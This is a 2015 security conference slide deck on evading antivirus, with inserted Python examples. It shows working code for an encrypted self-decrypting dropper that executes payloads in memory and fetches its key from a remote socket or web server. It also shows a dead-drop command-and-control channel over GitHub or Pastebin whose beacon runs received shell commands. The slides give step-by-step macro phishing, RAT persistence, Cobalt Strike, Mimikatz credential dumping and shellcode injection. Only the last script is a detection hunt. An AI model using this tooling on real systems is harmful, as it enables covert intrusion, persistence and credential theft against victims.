Evading Defenses with AcidRain, PowerShell, GitHub and Pastebin
Mike Poor, Jay Beale, Adam Crompton, Tyler Robinson and John Sawyer
InGuardians
(bonus booth talk on Word macro-based exploitation and remote access tool)
Copyright 2015 InGuardians, Inc.
Evasion Tactics
• Self-decrypting Python droppers
• PowerShell in-memory Command and Control
• (Booth) Macro execution and the Throwback Remote Access Tool
• Anti-virus vendor chosen:
– Symantec Endpoint Protection 12.1.16
AcidRain
• We've never been caught by A/V with AcidRain
• Encrypts the Python payload with AES-256
– We use msfvenom's Python version of Meterpreter
• PyInstaller to create an EXE
• Methods of obtaining the key:
– Keep the key in the payload
– Socket connect (nc -l)
– Web request (python SimpleHTTPServer)
• This works for any Python code.
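The dropper pattern the slide describes, as an added example that is not AcidRain's code: the build side encrypts a Python payload, and the stub obtains its key one of the three ways listed (embedded constant, TCP socket, HTTP GET), decrypts in memory and exec()s the source. The cipher is a SHA-256 counter-mode keystream, a stdlib stand-in for the AES-256 the slide names (swap in AES-CTR from PyCryptodome or `cryptography` for real use); the HMAC tag, the `PAYLOAD` text and the local key servers are this example's additions so that it runs offline and fails closed on a wrong key. Note that with the key embedded in the payload the scheme only defeats signature matching; anyone with the binary can recover the plaintext, which is why the socket and HTTP variants exist.

```python
"""Self-decrypting dropper in the shape the AcidRain slide describes.

Added example, not AcidRain's code.  Build side encrypts a Python payload;
the stub gets the key (embedded / TCP socket / HTTP GET), decrypts in
memory and exec()s the source.  Cipher: SHA-256 counter-mode keystream,
a stdlib stand-in for AES-256.  HMAC tag and local key servers are this
example's additions.
"""
import hashlib, hmac, os, socket, threading, urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the profiler module; any Python source works.
PAYLOAD = "import platform\nREPORT = {'os': platform.system(), 'marker': 'acidrain-demo'}\n"


def xor_keystream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Keystream block i = SHA-256(key || nonce || i), XORed over data."""
    ks = b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                  for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, ks))


def encrypt_payload(key: bytes, source: str) -> bytes:
    """Blob layout: nonce(16) || ciphertext || HMAC-SHA256(key, nonce || ct)."""
    nonce = os.urandom(16)
    ct = xor_keystream(key, nonce, source.encode())
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()


def decrypt_payload(key: bytes, blob: bytes) -> str:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        raise ValueError("bad key or tampered payload")
    return xor_keystream(key, nonce, ct).decode()


# --- the slide's three ways for the stub to obtain its 32-byte key ---------
def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def key_from_socket(host: str, port: int) -> bytes:
    """Attacker side is just:  nc -l -p PORT < key.bin"""
    with socket.create_connection((host, port), timeout=5) as s:
        return recv_exact(s, 32)


def key_from_http(url: str) -> bytes:
    """Attacker side: python -m SimpleHTTPServer (or http.server) beside key.bin."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env
    with opener.open(url, timeout=5) as r:
        return r.read()[:32]


def run_dropper(blob: bytes, key: bytes) -> dict:
    """Decrypt in memory and exec(); the plaintext never touches disk."""
    ns: dict = {}
    exec(decrypt_payload(key, blob), ns)
    return ns


# --- tiny local key servers so the whole thing runs offline ----------------
def serve_key_tcp(key: bytes) -> int:
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def one_client():
        conn, _ = srv.accept()
        conn.sendall(key)
        conn.close()
        srv.close()

    threading.Thread(target=one_client, daemon=True).start()
    return srv.getsockname()[1]


def serve_key_http(key: bytes) -> int:
    class KeyHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.end_headers()
            self.wfile.write(key)

        def log_message(self, *args):  # silence request logging
            pass

    httpd = HTTPServer(("127.0.0.1", 0), KeyHandler)
    threading.Thread(target=httpd.handle_request, daemon=True).start()
    return httpd.server_address[1]


def demo() -> dict:
    """Build once, run the stub three ways; returns the payload's marker per method."""
    key = os.urandom(32)
    blob = encrypt_payload(key, PAYLOAD)
    out = {"embedded": run_dropper(blob, key)["REPORT"]["marker"]}
    port = serve_key_tcp(key)
    out["socket"] = run_dropper(blob, key_from_socket("127.0.0.1", port))["REPORT"]["marker"]
    port = serve_key_http(key)
    out["http"] = run_dropper(blob, key_from_http(f"http://127.0.0.1:{port}/key.bin"))["REPORT"]["marker"]
    return out


if __name__ == "__main__":
    print(demo())
```

The blob is what PyInstaller would bundle; the key is not. A stub built with `key_from_socket` or `key_from_http` contains nothing a static scanner or a sandbox without network access can decrypt, and a wrong or missing key raises rather than exec()ing garbage.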
AcidRain Modules
• System profiler
– Mac, Linux, Windows
– Automated post-exploitation profiling commands
– Phones home, sends profiling output, cuts the connection
– Reconnects after a pre-defined time
• SOCKS4 proxy
• Bind shell
• Reverse shell
Uses PyInstaller
• PyInstaller bundles Python applications into a single EXE file.
• Run on Linux using Wine:
wine c:\\Python27\\python.exe /usr/share/pyinstaller/pyinstaller.py /home/user/hello.py --onefile
Demo
AcidRain
(Video will be linked to from InGuardians website within one week)
Puppet Master C2 Framework
• PowerShell Command and Control (C2) via widely-used third-party services
• Current payloads:
– Invoke-Github.ps1
– Invoke-Pastebin.ps1
• If these are blocked, we can create more, making the defenders play Whack-a-Mole!
• Submitting these to @harmj0y for Empire inclusion
PowerShell Commands
• The attacker types PowerShell commands and receives their output.
• This is incredibly powerful, as we can use all the PowerShell frameworks, our own cmdlets, or just start running commands.
GitHub and Pastebin
• On GitHub, we create a "gist," a non-project code publish
– All C2 data is comments on the gist.
• On Pastebin, we create a paste.
– The expiration date is set to a short time, say, one hour.
Encryption
• Prereq: PowerShell v2.0 and .NET version 4.0
• Encryption used: AES 256-bit via the ConvertTo-SecureString and ConvertFrom-SecureString cmdlets
– ConvertFrom-SecureString picks AES-128, -192 or -256 from the length of the -Key bytes (16, 24 or 32), so attacker and beacon must share the same 32-byte key. Without -Key the cmdlet falls back to DPAPI, whose output can only be decrypted by the same user on the same machine.
• All commands and results are encrypted before posting to the third-party page, to avoid divulging any data.
How Does the C2 Function
(Each step is drawn between three parties: Victim, Attacker, and Third Party Service (Pastebin, GitHub).)
1. Beacon checks in for a new command with a dynamic jitter rate.
2. Attacker sends a command in a request to the third party service's API.
3. Attacker polls the third party service until a response is posted.
4. Beacon gets the command that the attacker stored in the post and runs it on the host.
5. Beacon sends the command output back to the third party service.
6. Attacker gets the response from the service.
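The six-step exchange above and the encryption slide before it, as one added example that is not Puppet Master's code. Attacker and beacon never talk to each other: both only read and post comments on a third-party page, modelled here by `DeadDrop`, an in-memory stand-in for a gist comment thread or a paste. Every comment is encrypted and authenticated with a pre-shared 32-byte key before posting, so the page never carries plaintext. The cipher is a SHA-256 counter-mode keystream, a stdlib stand-in for the AES-256 the deck gets from ConvertFrom-SecureString -Key; `Operator`, `Beacon`, `DeadDrop`, the message layout and the `simulate` round trip are this example's own.

```python
"""Dead-drop C2 over a shared public page, following the six steps above.

Added example, not Puppet Master's code.  DeadDrop stands in for the
third-party page; Operator and Beacon only ever read/post comments on it.
Cipher: SHA-256 counter-mode keystream, a stdlib stand-in for AES-256.
"""
import base64, hashlib, hmac, json, os, random, subprocess


class DeadDrop:
    """The third-party service: an append-only, world-readable comment thread."""
    def __init__(self):
        self.comments = []              # {"id": int, "body": str}

    def post(self, body: str) -> int:
        self.comments.append({"id": len(self.comments) + 1, "body": body})
        return self.comments[-1]["id"]

    def since(self, last_id: int) -> list:
        return [c for c in self.comments if c["id"] > last_id]


def xor_keystream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    ks = b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                  for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, ks))


def seal(key: bytes, msg: dict) -> str:
    """dict -> JSON -> encrypt -> HMAC -> base64 comment body."""
    nonce = os.urandom(16)
    ct = xor_keystream(key, nonce, json.dumps(msg).encode())
    return base64.b64encode(nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()).decode()


def open_sealed(key: bytes, body: str):
    """Inverse of seal(); None for junk, foreign or tampered comments."""
    try:
        raw = base64.b64decode(body, validate=True)
    except ValueError:
        return None
    if len(raw) < 48:
        return None
    nonce, ct, tag = raw[:16], raw[16:-32], raw[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        return None
    return json.loads(xor_keystream(key, nonce, ct))


def jittered_interval(base_seconds: float, jitter: float, rng=random) -> float:
    """Step 1: check-in interval with dynamic jitter, e.g. 60 s +/- 30 %."""
    return base_seconds * (1 + rng.uniform(-jitter, jitter))


class Beacon:
    def __init__(self, key: bytes, drop: DeadDrop):
        self.key, self.drop, self.last_id = key, drop, 0

    def check_in(self) -> int:
        """Steps 1, 4, 5: read new comments, run any command, post the output."""
        handled = 0
        for c in self.drop.since(self.last_id):
            self.last_id = c["id"]
            msg = open_sealed(self.key, c["body"])
            if not msg or msg.get("type") != "cmd":
                continue                # junk, tampered, or our own earlier output
            proc = subprocess.run(msg["cmd"], shell=True, capture_output=True,
                                  text=True, timeout=60)
            self.drop.post(seal(self.key, {"type": "out", "seq": msg["seq"],
                                           "stdout": proc.stdout, "rc": proc.returncode}))
            handled += 1
        return handled


class Operator:
    def __init__(self, key: bytes, drop: DeadDrop):
        self.key, self.drop, self.last_id, self.seq = key, drop, 0, 0

    def send(self, cmd: str) -> int:
        """Step 2: post an encrypted command; returns its sequence number."""
        self.seq += 1
        self.drop.post(seal(self.key, {"type": "cmd", "seq": self.seq, "cmd": cmd}))
        return self.seq

    def poll(self, seq: int):
        """Steps 3 and 6: scan new comments for the output matching seq."""
        for c in self.drop.since(self.last_id):
            self.last_id = c["id"]
            msg = open_sealed(self.key, c["body"])
            if msg and msg.get("type") == "out" and msg["seq"] == seq:
                return msg
        return None


def simulate(cmd: str = "echo hello") -> dict:
    """One full round trip; the page itself only ever holds base64 ciphertext."""
    key = os.urandom(32)                # pre-shared out of band, like the PowerShell -Key
    drop = DeadDrop()
    op, beacon = Operator(key, drop), Beacon(key, drop)
    seq = op.send(cmd)
    drop.post("nothing to see here")    # a stranger's comment: ignored by both sides
    beacon.check_in()
    return op.poll(seq)


if __name__ == "__main__":
    print(simulate())
```

Because every comment is authenticated, a defender who finds the gist and posts their own comments cannot inject commands or crash the beacon; they can only observe encrypted blobs and the posting cadence, which is what the jitter is there to blur.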
DEMO
Invoke-Pastebin.ps1 Invoke-Github.ps1
(Video will be linked to from InGuardians website within one week)
Booth: Macro-Based Injection
• Threat actors don't always use sophisticated attacks.
• Why use a $10k 0-day or reverse engineer a protocol when a simple email will work?
• Microsoft Office macro-based payload injection
– Great way to get an initial foothold or gain more access in the environment.
– Utilizes memory-based injection
Executables Embedded in Macros
• We use Office Developer Tools to create a macro containing an encrypted and base64-encoded payload.
• We place the macro in a document, formatted as a regular .doc or .xls file.
– It does not have to be the .docm format.
• The payload executes silently in the background.
• This payload could be an .EXE or a .DLL file.
Additional A/V Evasion
• The macro can drop the payload to disk as a compressed archive to help avoid detection.
• We can extract a DLL as a .log file in a hidden directory and run it using rundll32.exe.
• In this case, we're going to place the Throwback open source RAT onto the system via the macro.
Payload and Persistence
• In this demo, the Throwback backdoor:
– drops a .exe into a hidden directory as a hidden file,
– runs this .exe, which deletes its own on-disk file,
– which in turn copies a second .exe to a different hidden directory as a different hidden file,
– and creates a service and checks proxy settings to gain Internet access to call home, all using native Windows API calls.
Throwback RAT
• We use the Throwback RAT as a long-term foothold in the organization.
• The RAT beacons home over HTTP(S) and DNS, using WinHTTP/WinINet for proxy awareness.
• The backdoor is then used to pivot to other boxes, where we deploy RATs on systems other than the beaconing hosts, to retain access and avoid detection.
DLL Execution: Cobalt Strike Beacon
• Here, we place the Cobalt Strike Reverse HTTPS Beacon on the victim as perflib0.log and execute with rundll32.exe.
• Run Mimikatz and hashdump for cleartext passwords and local hashes.
• We could also use the beacon to spawn meterpreter in memory, use powershell, pivot, scan and attack.
Injecting Shellcode into a Process
• We also inject a Meterpreter payload into an already-running process: we generate raw shellcode (perflib0.html) and inject it into the target process.
• This was not detected by A/V.
Steps in the Video 1 of 2
1. Create a Word macro and e-mail it to a social-engineering victim.
2. Victim opens the Word doc and approves the macro.
3. Throwback binary starts, connects to the PHP app.
4. Get a process list to find a process to inject into.
5. Create Meterpreter shellcode (perflib0.html)
6. Download Cobalt Strike Beacon (perflib0.log)
Steps in the Video 2 of 2
7. Instruct the victim to rundll32 perflib0.log
8. Instruct the victim to download the shellcode and inject it into PID 1560.
9. Interact over Cobalt Strike.
10. Interact over the Meterpreter session.
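Two of the steps above leave telemetry a defender can hunt for: rundll32.exe loading a module that does not carry a DLL extension (perflib0.log), and an Office process starting the dropped executable. The following is an added example, not part of the deck or of Throwback; the process-creation records and their field layout are constructed for it (not Sysmon's or any vendor's format), and the dropped executable's name, path and the `Start` entry point are invented placeholders since the deck does not give them.

```python
"""Hunting the booth demo's tradecraft in process-creation telemetry.

Added example, not from the deck or Throwback.  Two checks:
  1. rundll32.exe whose module argument lacks a normal DLL extension
     (the demo's perflib0.log);
  2. an Office application spawning an executable (the macro starting
     the dropped .exe), minus a small allow-list of Office's own helpers.
SAMPLE_EVENTS and the ProcEvent layout are constructed for this example.
"""
import os
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DLL_EXTENSIONS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
# Children Office legitimately launches; a starting point to tune per environment.
OFFICE_CHILD_ALLOW = {"splwow64.exe"}

# rundll32 command lines look like:  [path\]rundll32[.exe] <module>[,<entry>] [args]
# The module may be quoted (paths with spaces) or bare (stops at space or comma).
RUNDLL32_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(?:"([^"]+)"|([^\s,]+))', re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rundll32_module(command_line: str):
    """Return the module rundll32 was asked to load, or None if not a rundll32 line."""
    m = RUNDLL32_RE.match(command_line)
    if not m:
        return None
    return m.group(1) or m.group(2)


def hunt(events):
    """Return (event index, rule name, detail) for every suspicious record."""
    findings = []
    for i, ev in enumerate(events):
        image = basename(ev.image)
        if image == "rundll32.exe":
            module = rundll32_module(ev.command_line)
            ext = os.path.splitext(basename(module or ""))[1]
            if module is None or ext not in DLL_EXTENSIONS:
                findings.append((i, "rundll32_non_dll_module", module))
        if basename(ev.parent_image) in OFFICE_APPS and image not in OFFICE_CHILD_ALLOW:
            findings.append((i, "office_spawned_process", ev.image))
    return findings


# Constructed records (not real telemetry) walking through the video's steps.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL"),               # benign
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n invoice.doc'),
    ProcEvent(r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
              r"C:\Users\victim\AppData\Local\Temp\dropped.exe",          # placeholder name
              r"C:\Users\victim\AppData\Local\Temp\dropped.exe"),
    ProcEvent(r"C:\Users\victim\AppData\Local\Temp\dropped.exe",
              r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe "C:\ProgramData\Perf Logs\perflib0.log",Start'),  # video step 7
    ProcEvent(r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
              r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),  # allow-listed
]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The extension check is deliberately about what rundll32 was asked to load rather than about the file's contents: a PE with a .log extension is the whole trick, and the command line is usually the only artifact left once the DLL has deleted or renamed itself.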
Demo (Video will be linked to from InGuardians website within one week)
Pivot, Pivot, Pivot
• With an initial foothold, the goal is always to pivot and avoid detection.
• With good OPSEC, you can maintain long-term access as well as pivot and attack.